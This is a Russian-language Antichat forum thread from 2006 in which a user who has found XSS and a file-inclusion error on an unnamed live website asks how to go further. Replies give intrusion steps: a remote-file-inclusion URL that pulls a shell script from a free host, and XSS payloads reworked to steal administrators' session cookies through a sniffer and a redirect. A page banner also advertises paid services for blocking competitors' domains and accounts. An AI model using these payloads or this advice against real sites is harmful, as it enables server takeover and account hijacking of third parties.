Форум АНТИЧАТ - Подскажите, что следует делать дальше...

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Оффтоп > Болталка
Подскажите, что следует делать дальше...

Опции темы

Поиск в этой теме

Опции просмотра

Подскажите, что следует делать дальше...

14.01.2006, 14:57

Jonathan Allen

Познающий

Регистрация: 21.03.2005

Сообщений: 71

Провел на форуме:
516278

Репутация: 15

Подскажите, что следует делать дальше...

Есть сайт, работает xss

Если написать вот так:

http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script>

То, как видно из скрипта - вылетает табличка с название сайта. Работет и такое, например....

http://[САЙТ]/?node=tralala

Соответственно имеем такое:

Warning: main(pages/tralala.php): failed to open stream: No such file or directory in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5

Код:

Warning: main(): Failed opening 'pages/tralala.php' for inclusion (include_path='.:/usr/share/php') in /srv/www/htdocs/web1891/html/includes/LowerCenter.php on line 5

И так далее...

Скажите, пожалуйста, что делать дальше?

14.01.2006, 19:05

TTyck

Участник форума

Регистрация: 13.11.2005

Сообщений: 199

Провел на форуме:
824195

Репутация: 75

Отправить сообщение для TTyck с помощью ICQ

поставляй вместо тралала адрес на шел, предварительно тобой залитый на бесплатный хостинг.

14.01.2006, 19:11

D1mOn

Постоянный

Регистрация: 02.10.2005

Сообщений: 490

Провел на форуме:
2333839

Репутация: 212

буит примерно так http://[САЙТ]/?node=http://site.narod.ru/shell.php
Удачи тебе)))

14.01.2006, 19:50

dim_ok

Green member - Level 3

Регистрация: 26.03.2005

Сообщений: 191

Провел на форуме:
6768708

Репутация: 185

ну с http://[САЙТ]/?node=view/666"><script>alert(document.domain)</script> это только менять алерт на ссылу со сниффером и пробовать подсовывать админам и т.п. вообщем прилигированным пользователям, и то если там используются куки для авторизации
а с http://[САЙТ]/?node=tralala у тебя ничего не выйдет т.к. ты не сможешь выдти за пределы папки pages

__________________
Дайте мне точку опоры и я переверну землю!

irc.antichat.net #antichat

14.01.2006, 20:19

Jonathan Allen

Познающий

Регистрация: 21.03.2005

Сообщений: 71

Провел на форуме:
516278

Репутация: 15

Спасибо, ребята но с шеллом ничего не вышло...

dim_ok

Если сдеать вот так:

http://[САЙТ]/?node=></td></tr></form></table><script>alert(document.cookie);</script>

То мне вылетает такое сообщение

PHPSESSID=76a45e1a35900e78ddfb180e83a6b379;_c=y

Это что-то дает? Или находу генерирует?

14.01.2006, 23:47

SanyaX

.::Club Life::.

Регистрация: 28.01.2005

Сообщений: 1,205

Провел на форуме:
7426415

Репутация: 1398

Отправить сообщение для SanyaX с помощью ICQ

Делай редирект на страницу и засовывай туда Java script код чтобы угонять куки посмотреть его можно на главной странице античате где идёт надрись"описание снифера".

__________________
-=Ok let's Go=-
-=OpenVPN=-

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Выполняется sql inj что делать дальше?)	zveri	Болталка	1	04.08.2005 23:37
подскажите что эта ссылка умеет делать	Orlow	Болталка	1	20.07.2005 04:01
Нашел дыру, но не знаю че делать дальше - помогите новичку :)	m4e	Болталка	21	23.06.2005 15:45
ПОДСКАЖИТЕ что делать дальше?!	][s0u1	Болталка	24	30.04.2005 10:49

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход